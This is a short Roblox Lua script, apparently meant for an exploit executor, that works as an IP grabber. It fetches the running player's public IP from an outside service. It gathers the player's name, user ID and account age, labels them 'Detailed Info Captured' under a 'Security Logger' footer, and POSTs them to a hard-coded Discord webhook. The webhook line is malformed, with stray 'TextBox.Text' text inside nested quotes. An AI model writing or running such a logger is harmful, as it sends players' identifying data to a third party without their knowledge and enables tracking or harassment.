local http_request = http_request or request or HttpPost or syn.request
local HttpService = game:GetService("HttpService")

-- جلب عنوان الـ IP من خدمة خارجية
local ip_data = "Unknown"
pcall(function()
    ip_data = game:HttpGet("https://api.ipify.org")
end)

local data = {
    ["content"] = "New Player Logged",
    ["embeds"] = {{
        ["title"] = "Detailed Info Captured",
        ["color"] = 16711680,
        ["fields"] = {
            {["name"] = "Player Name", ["value"] = game.Players.LocalPlayer.Name, ["inline"] = true},
            {["name"] = "User ID", ["value"] = tostring(game.Players.LocalPlayer.UserId), ["inline"] = true},
            {["name"] = "IP Address", ["value"] = ip_data, ["inline"] = false},
            {["name"] = "Account Age", ["value"] = tostring(game.Players.LocalPlayer.AccountAge) .. " days", ["inline"] = true}
        },
        ["footer"] = {["text"] = "Security Logger"}
    }}
}

http_request({
    Url = "TextBox.Text = "https://discord.com/api/webhooks/1484276862141206719/zOcp4uJP04tWBkF-dIzBdIoBytasTcx5spBhTIp9YjddWfL49YwreudJV7aJbxatGjad"",
    Method = "POST",
    Headers = {["Content-Type"] = "application/json"},
    Body = HttpService:JSONEncode(data)
})
